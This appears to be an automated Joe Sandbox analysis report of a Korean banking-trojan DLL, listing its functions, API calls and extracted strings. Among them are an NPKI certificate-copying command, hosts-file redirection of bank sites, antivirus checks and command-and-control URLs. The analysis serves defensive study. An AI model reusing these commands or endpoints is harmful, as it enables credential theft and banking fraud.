_CxxThrowException 8089->8091 8091->8090 7444 100059d0 7445 100059d5 7444->7445 7446 10010feb 2 API calls 7445->7446 7447 100059fa 7446->7447

                                                        Executed Functions

                                                        Function 1000B0A0 Relevance: 79.1, APIs: 33, Strings: 12, Instructions: 387stringfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: lstrcatrand$FileFindlstrcpy$CountFirstNextTick_strcmpisrand
                                                        • String ID: %s\%s$*.*$.$/u.php$09161305.txt$107.163.241.204:12354/show.php$NPKI$P$c:\%c%c%c%c.%c%c%c$c:\%s$cmd.exe /c md c:\%s && xcopy /Y "%s" "c:\%s" /S /E /C /H && exit$cmd.exe /c rd /q /s "c:\%s"
                                                        • API String ID: 3781771675-4019994392
                                                        • Opcode ID: 2284cdc7a81e1ca56d47e462f78087d377d0c49b06d915c65bae469ad145cbd7
                                                        • Instruction ID: a4cd3bd12e50bbdbb4defcecebe161b9358dfbd0595dc6434b30c1e57eafc0f0
                                                        • Opcode Fuzzy Hash: 2284cdc7a81e1ca56d47e462f78087d377d0c49b06d915c65bae469ad145cbd7
                                                        • Instruction Fuzzy Hash: 9ED1A6B1508386AFE725CB64CD91BEB77DAEBC8344F004D2DE68697241DB74E6088753
                                                        Function 100055E0 Relevance: 56.3, APIs: 23, Strings: 9, Instructions: 263networksleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 108 100055e0-100056d1 WSAStartup socket * 2 htons inet_addr htons inet_addr bind ioctlsocket 109 100056d7-10005714 select 108->109 110 10005716-10005727 Sleep 109->110 111 10005729-10005766 109->111 110->109 111->109 114 1000576c-1000576e 111->114 115 10005774-100057ee call 10005530 wsprintfA 114->115 116 10005947-10005956 call 10004da0 114->116 124 100057f0-100057fe 115->124 125 10005828-10005869 malloc htons 115->125 121 10005959-1000597e closesocket * 2 116->121 131 10005820 124->131 132 10005800-1000580e 124->132 126 1000587a-100058de htons * 5 125->126 127 1000586b-10005871 125->127 133 100058e0-100058e5 126->133 134 100058e7 126->134 127->126 128 10005873-10005878 htons 127->128 128->126 131->125 132->131 137 10005810-1000581e 132->137 136 100058ec-10005934 inet_addr 133->136 134->136 139 100056d3 136->139 140 1000593a-10005940 136->140 137->125 137->131 139->109 140->121 142 10005942 140->142 142->109
                                                        APIs
                                                        Strings
                                                        • c:\3.txt, xrefs: 1000594C
                                                        • ahnlab, xrefs: 10005804
                                                        • 8.8.8.8, xrefs: 1000562D
                                                        • iRecv=0, xrefs: 10005947
                                                        • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 100057D9
                                                        • %s|, xrefs: 100057BB
                                                        • alyac, xrefs: 100057F4
                                                        • v3lite, xrefs: 10005814
                                                        • 127.0.0.1, xrefs: 1000568F, 100058E7
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: htons$inet_addr$closesocketsocket$SleepStartupbindioctlsocketmallocselectwsprintf
                                                        • String ID: %s|$127.0.0.1$8.8.8.8$ahnlab$alyac$c:\3.txt$iRecv=0$v3lite$www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
                                                        • API String ID: 1328051524-4015207955
                                                        • Opcode ID: d30cd6855118c4ed05db812acc6ca3ede84177798b14eb5f2c727256319347d2
                                                        • Instruction ID: 59d3b204b2808b52f16618dbfe599499a9605bca090f4b5bd4268c99c502d16b
                                                        • Opcode Fuzzy Hash: d30cd6855118c4ed05db812acc6ca3ede84177798b14eb5f2c727256319347d2
                                                        • Instruction Fuzzy Hash: 3DA19D31608344ABE710DB64CC85BAFBBE9EFC8744F00491DF68597290DBB5EA48CB56
                                                        Function 100051B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 92libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • LoadLibraryA.KERNEL32 ref: 100051CA
                                                        • GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 100051DA
                                                        • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000), ref: 100051F1
                                                        • malloc.MSVCRT ref: 1000520A
                                                        • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,?,1000BBB2,00000035), ref: 10005230
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ExtendedTable$AddressLibraryLoadProcmalloc
                                                        • String ID: GetExtendedUdpTable$iphlpapi.dll
                                                        • API String ID: 2385667234-1809394930
                                                        • Opcode ID: 9cda4d2d937ca9ea04656a738db3750c05e85a8b7bb6ff9873d4febcff501f4c
                                                        • Instruction ID: 96f58e0131db4c2794c4102475dfcdcfa91b6622e08c4e565781b4b339fe8ff8
                                                        • Opcode Fuzzy Hash: 9cda4d2d937ca9ea04656a738db3750c05e85a8b7bb6ff9873d4febcff501f4c
                                                        • Instruction Fuzzy Hash: 9021E171204302ABE710DB28EC85BAB33E4EF857A0F014625F995C62C0D736D989CBA2
                                                        Function 1000C230 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145filewindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • sprintf.MSVCRT ref: 1000C249
                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1000C266
                                                        • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 1000C298
                                                        • GetLastError.KERNEL32(00000400,?,00000000,00000000), ref: 1000C2AC
                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 1000C2BA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ControlCreateDeviceErrorFileFormatLastMessagesprintf
                                                        • String ID: \\.\PHYSICALDRIVE%d
                                                        • API String ID: 1111953355-613073274
                                                        • Opcode ID: 2acd1e0c19e908a93b7c5b7100dcee112086fd50c9f33c41a1c608c64b3fe2b4
                                                        • Instruction ID: 5ad80bb175373b9c79a99d82296efbae5e1858b0759fafeee38c0ba9caf204da
                                                        • Opcode Fuzzy Hash: 2acd1e0c19e908a93b7c5b7100dcee112086fd50c9f33c41a1c608c64b3fe2b4
                                                        • Instruction Fuzzy Hash: EE4128762503046BF324DA38DC46FEB7395EBD8760F508729FA55CB1C0EEB59A088395
                                                        Function 10004F60 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000028,00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F6A
                                                        • OpenProcessToken.ADVAPI32(00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F71
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10004F87
                                                        • AdjustTokenPrivileges.KERNELBASE ref: 10004FCA
                                                        • CloseHandle.KERNEL32 ref: 10004FD5
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                        • String ID:
                                                        • API String ID: 3038321057-0
                                                        • Opcode ID: 6492371ed49e88a72c7fec690fb5aec638d8b1baddfd75691bf953eb0ca51b84
                                                        • Instruction ID: c701719b87b05cfe8771a17752f492869be4f49267ac35e7975cb97a64b2d278
                                                        • Opcode Fuzzy Hash: 6492371ed49e88a72c7fec690fb5aec638d8b1baddfd75691bf953eb0ca51b84
                                                        • Instruction Fuzzy Hash: B001D7B8608301ABE704DF64C885B6A77E8FBC8B45F40891CF58986294DB74D945CB62
                                                        Function 1000C160 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeviceIoControl.KERNEL32(00000000,0007C088,?,00000020,?,00000210,1000C305,00000000), ref: 1000C1B0
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ControlDevice
                                                        • String ID:
                                                        • API String ID: 2352790924-0
                                                        • Opcode ID: 922dce9e470f2a9cc2907bd16655acb977d25aac2a30b40252a160cce2e3ee64
                                                        • Instruction ID: 86cc3cd5e500d09f34f504799c04322c58a7eb8eb055a7fb12ab9f39681c7df9
                                                        • Opcode Fuzzy Hash: 922dce9e470f2a9cc2907bd16655acb977d25aac2a30b40252a160cce2e3ee64
                                                        • Instruction Fuzzy Hash: 98F0A96228A3C29EE302CB688855BD2FFA47B76710F0CD7C9E1D85B283C2548598D766
                                                        Function 10004AA0 Relevance: 1.5, APIs: 1, Instructions: 6processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000000,00000000,10006A02,00000002,00000000,00000000,00000000), ref: 10004AAA
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CreateSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 3332741929-0
                                                        • Opcode ID: ffb66c5084afd78fca587a2f1059ca1cf85e345028acd843578f3c2e5860b739
                                                        • Instruction ID: 060d65689bf084ce19dac5ab6480e93eac1479a40d4c6f650e99f699fddfa71d
                                                        • Opcode Fuzzy Hash: ffb66c5084afd78fca587a2f1059ca1cf85e345028acd843578f3c2e5860b739
                                                        • Instruction Fuzzy Hash: BEB09276104200ABD204DB10C984C2BB7E8AB94340B008808F88682110C634D880CB21
                                                        Function 1000BB20 Relevance: 77.3, APIs: 29, Strings: 15, Instructions: 267sleepfilesynchronizationCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 10006AA0: wsprintfA.USER32 ref: 10006ACE
                                                          • Part of subcall function 10006AA0: GetModuleFileNameA.KERNEL32(00000000,c:\windows\SysWOW64\rundll32.exe,00000104,1000BB2D), ref: 10006AE5
                                                          • Part of subcall function 10006AA0: GetModuleFileNameA.KERNEL32(10000000,c:\ftelcs\rjqzr.dll,00000104), ref: 10006AF7
                                                          • Part of subcall function 10006AA0: strrchr.MSVCRT ref: 10006B25
                                                          • Part of subcall function 10006AA0: wsprintfA.USER32 ref: 10006B3D
                                                          • Part of subcall function 10006AA0: wsprintfA.USER32 ref: 10006B4E
                                                          • Part of subcall function 10006AA0: wsprintfA.USER32 ref: 10006B5F
                                                        • PathFileExistsA.SHLWAPI(c:\test.1), ref: 1000BB32
                                                        • GetCurrentProcessId.KERNEL32 ref: 1000BB3C
                                                          • Part of subcall function 10004FF0: OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1000509A,?,76F90F00), ref: 10004FFD
                                                          • Part of subcall function 10004FF0: TerminateProcess.KERNEL32(00000000,00000000), ref: 1000500C
                                                          • Part of subcall function 10004FF0: CloseHandle.KERNEL32(00000000), ref: 10005017
                                                        • ExitProcess.KERNEL32 ref: 1000BB4D
                                                        • CreateMutexA.KERNEL32(00000000,00000001,Mkrnaver.com:6520), ref: 1000BB5D
                                                        • GetLastError.KERNEL32 ref: 1000BB63
                                                        • Sleep.KERNEL32(000007D0), ref: 1000BC33
                                                        • DeleteFileA.KERNEL32(?), ref: 1000BC36
                                                        • CreateThread.KERNEL32(00000000,00000000,10009280,00000000,00000000,00000000), ref: 1000BC5B
                                                        • Sleep.KERNEL32(000003E8), ref: 1000BC62
                                                        Strings
                                                        • krnaver.com:6520, xrefs: 1000BC8D, 1000BD0B
                                                        • Mkrnaver.com:6520, xrefs: 1000BB54
                                                        • c:\ftelcs\ReadMe.txt, xrefs: 1000BB8E, 1000BBDA
                                                        • c:\windows\system32, xrefs: 1000BC0B
                                                        • 123, xrefs: 1000BBBA
                                                        • c:\test.1, xrefs: 1000BB2D
                                                        • cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "%s", xrefs: 1000BE1C
                                                        • d3d3LnNoaW5oYW4uY29tfHNlYXJjaC5kYXVtLm5ldHxzZWFyY2gubmF2ZXIuY29tfHd3dy5rYnN0YXIuY29tLmlrcnx3d3cua25iYW5rLmNvLmtyLmlrcnxvcGVuYmFuay5jdS5jby5rci5pa3J8d3d3LmJ1c2FuYmFuay5jby5rci5pa3J8d3d3Lm5vbmdoeXVwLmNvbS5pa3J8d3d3LnNoaW5oYW4uY29tLmlrcnx3d3cud29vcmliYW5rLmNvbS5p, xrefs: 1000BCAA
                                                        • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 1000BCE3
                                                        • SeDebugPrivilege, xrefs: 1000BB7F
                                                        • c:\wiseman.exe, xrefs: 1000BBF8, 1000BC12
                                                        • aHR0cDovLzE3NC4xMzkuNjUuMjIyOjI1MzY4L25ld3MucGhw, xrefs: 1000BC7E
                                                        • http://107.163.241.204:12354/show.php, xrefs: 1000BCB9
                                                        • c:\ftelcs, xrefs: 1000BE13
                                                        • MTc0LjEzOS42NS44Njo1NjU4MA==, xrefs: 1000BC6D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: FileProcesswsprintf$CreateModuleNameSleep$CloseCurrentDeleteErrorExistsExitHandleLastMutexOpenPathTerminateThreadstrrchr
                                                        • String ID: 123$MTc0LjEzOS42NS44Njo1NjU4MA==$Mkrnaver.com:6520$SeDebugPrivilege$aHR0cDovLzE3NC4xMzkuNjUuMjIyOjI1MzY4L25ld3MucGhw$c:\ftelcs$c:\ftelcs\ReadMe.txt$c:\test.1$c:\windows\system32$c:\wiseman.exe$cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "%s"$d3d3LnNoaW5oYW4uY29tfHNlYXJjaC5kYXVtLm5ldHxzZWFyY2gubmF2ZXIuY29tfHd3dy5rYnN0YXIuY29tLmlrcnx3d3cua25iYW5rLmNvLmtyLmlrcnxvcGVuYmFuay5jdS5jby5rci5pa3J8d3d3LmJ1c2FuYmFuay5jby5rci5pa3J8d3d3Lm5vbmdoeXVwLmNvbS5pa3J8d3d3LnNoaW5oYW4uY29tLmlrcnx3d3cud29vcmliYW5rLmNvbS5p$http://107.163.241.204:12354/show.php$krnaver.com:6520$www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
                                                        • API String ID: 666504283-2884798123
                                                        • Opcode ID: eeceb974db4162b4b79dbcfdfdf24e000be0470a91cd1a8cc186129b97d64d08
                                                        • Instruction ID: 5cd0a8869e93d6a979fce39eaddf385ca287bc042528285295ef5772baaaf24e
                                                        • Opcode Fuzzy Hash: eeceb974db4162b4b79dbcfdfdf24e000be0470a91cd1a8cc186129b97d64d08
                                                        • Instruction Fuzzy Hash: 42710275784B043BF260E7B49C47FAA3581DB85B95F210618F706BE1C6DEE0FA44816E
                                                        Function 10007640 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 168stringnetworkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: strcspnstrstr$strncpy$Startupatoiclosesocketconnecthtonssocket
                                                        • String ID: http://
                                                        • API String ID: 2221484516-1121587658
                                                        • Opcode ID: e796253f5733396ff72147a4a2ef7bd5d4f44e6beee7f9c8da961514743a8591
                                                        • Instruction ID: 0e5d105b79d1c08d9eecff392c4fb5612e00c83b4c249196a63be804c0ca8b01
                                                        • Opcode Fuzzy Hash: e796253f5733396ff72147a4a2ef7bd5d4f44e6beee7f9c8da961514743a8591
                                                        • Instruction Fuzzy Hash: 0851D4312043406BE314DB34CC45BEBB7D9FFC9354F404A2DFA5997280EB79D65886A6
                                                        Function 10009290 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 205sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 10001000: lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
                                                        • Sleep.KERNEL32(0000EA60), ref: 100092D8
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10009323
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000932F
                                                        • Sleep.KERNEL32(000927C0), ref: 10009470
                                                        • wsprintfA.USER32 ref: 100094C1
                                                        • Sleep.KERNEL32(000927C0), ref: 1000951B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Sleep$DirectorySystem$lstrcpywsprintf
                                                        • String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.241.204:12354/show.php$iOffset
                                                        • API String ID: 2291147283-2972267883
                                                        • Opcode ID: 3947ad85ef8615cbfb42fece4b63a6b130437b3477a6dfc2854689d71249a6be
                                                        • Instruction ID: 4b4f84e37046363ba8aa3a5b9b5c37e80be516aa45bc2cdeab28b5ca764bbc5e
                                                        • Opcode Fuzzy Hash: 3947ad85ef8615cbfb42fece4b63a6b130437b3477a6dfc2854689d71249a6be
                                                        • Instruction Fuzzy Hash: 515147755046446BE765C674CC52BEB36C6EBC83D0F100A3CF74A872C6EE71EA498692
                                                        Function 10004DA0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 145filestringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,76F90F00,10005086,00000000,self), ref: 10004DFC
                                                        • strrchr.MSVCRT ref: 10004E09
                                                        • CreateFileA.KERNEL32(?,10000000,00000007,00000000,00000004,00000080,00000000), ref: 10004E62
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10004E78
                                                        • time.MSVCRT(00000000), ref: 10004E7F
                                                        • _localtime32.MSVCRT(?), ref: 10004E8E
                                                        • strftime.MSVCRT ref: 10004EA1
                                                        • vsprintf.MSVCRT ref: 10004EF3
                                                        • sprintf.MSVCRT ref: 10004F13
                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10004F3D
                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10004F44
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleModuleNamePointerWrite_localtime32sprintfstrftimestrrchrtimevsprintf
                                                        • String ID: %s%s$log.txt
                                                        • API String ID: 2392943451-1489102009
                                                        • Opcode ID: d1bdc3c774a689637d6f495e9813b9ee9ac93210ea13629b8e67d8557dd03d55
                                                        • Instruction ID: d5d278936535e4cba90bc0b152de8e4c93260a9cf759ec48f07ff2ba3d5d953d
                                                        • Opcode Fuzzy Hash: d1bdc3c774a689637d6f495e9813b9ee9ac93210ea13629b8e67d8557dd03d55
                                                        • Instruction Fuzzy Hash: DF41B5B1148345AFE328CB74CC899EB7BA9EBC8350F404A2DF75A872D0DFB499098651
                                                        Function 1000B6A0 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 189sleepprocessCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 218 1000b6a0-1000b775 GetSystemDirectoryA * 2 call 10001000 * 2 call 10010f36 225 1000b777-1000b7c2 call 10006dc0 218->225 228 1000b7c4-1000b7d9 225->228 229 1000b7db-1000b7ec 225->229 230 1000b7ed-1000b819 call 10004920 call 100074c0 228->230 229->230 235 1000b81b-1000b828 Sleep 230->235 236 1000b82d-1000b831 230->236 235->225 237 1000b833-1000b83b 236->237 238 1000b857-1000b866 236->238 239 1000b842-1000b845 237->239 240 1000b83d-1000b841 237->240 241 1000b8b0-1000b8db call 10009690 WinExec Sleep 238->241 242 1000b868-1000b86a 238->242 244 1000b847-1000b84a 239->244 245 1000b84c 239->245 240->239 241->225 246 1000b86f-1000b875 242->246 248 1000b84f-1000b855 244->248 245->248 249 1000b893-1000b895 246->249 250 1000b877-1000b879 246->250 248->237 248->238 253 1000b898-1000b89a 249->253 251 1000b87b-1000b883 250->251 252 1000b88f-1000b891 250->252 251->249 254 1000b885-1000b88d 251->254 252->253 253->241 255 1000b89c-1000b8ad wsprintfA 253->255 254->246 254->252 255->241
                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B6EA
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B6F9
                                                          • Part of subcall function 10001000: lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
                                                        • Sleep.KERNEL32(000927C0), ref: 1000B822
                                                        • wsprintfA.USER32 ref: 1000B8A7
                                                        • WinExec.KERNEL32(cmd.exe /c ipconfig /flushdns,00000000), ref: 1000B8C9
                                                        • Sleep.KERNEL32(000927C0), ref: 1000B8D5
                                                        Strings
                                                        • 8.8.8.8, xrefs: 1000B8B0
                                                        • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 1000B716
                                                        • http://107.163.241.204:12354/show.php, xrefs: 1000B7DB
                                                        • cmd.exe /c ipconfig /flushdns, xrefs: 1000B8C4
                                                        • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 1000B6FB
                                                        • 127.0.0.1, xrefs: 1000B8B5
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: DirectorySleepSystem$Execlstrcpywsprintf
                                                        • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$cmd.exe /c ipconfig /flushdns$http://107.163.241.204:12354/show.php
                                                        • API String ID: 3328814713-1394719493
                                                        • Opcode ID: 5ededa175b8e96c9b9bc53b0268d409d7794e43692312860f689a34b4737d91d
                                                        • Instruction ID: 88cf6c134119007ad9893c1780bc282dad92caf7e2c613694f1faa43efeb6312
                                                        • Opcode Fuzzy Hash: 5ededa175b8e96c9b9bc53b0268d409d7794e43692312860f689a34b4737d91d
                                                        • Instruction Fuzzy Hash: 6C517F71504A486BE764CE74CC51AEB3BCAEBC8290F104A3CF7468B2D5EE75D948C391
                                                        Function 00F307DD Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 151memorywindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 256 f307dd-f3080b 257 f30822-f30872 call f30975 VirtualAlloc call f30c50 256->257 258 f3080d-f30812 256->258 264 f30878-f30897 call f30bae call f30ac9 call f309cf 257->264 265 f3090c-f30920 MessageBoxA ExitProcess 257->265 258->257 259 f30814-f30820 258->259 259->257 272 f30926-f3092f 264->272 273 f3089d-f308a9 call f30e1c 264->273 275 f30931-f30943 272->275 276 f30946-f30974 call f30f96 VirtualFree 272->276 273->272 279 f308ab-f308b9 273->279 275->276 281 f308c3-f308c9 279->281 282 f308bb-f308c1 279->282 284 f308cb-f308e7 wsprintfA 281->284 285 f308e9-f308ef 281->285 283 f308f0-f30900 wsprintfA 282->283 286 f30906 283->286 284->286 285->283 286->265
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,ABAD1000,00001000,00000040,00F31100), ref: 00F3085C
                                                        • wsprintfA.USER32 ref: 00F308E1
                                                        • wsprintfA.USER32 ref: 00F30900
                                                        • MessageBoxA.USER32(00000000,File corrupt.,Application error,00000010), ref: 00F30918
                                                        • ExitProcess.KERNEL32(00000000), ref: 00F30920
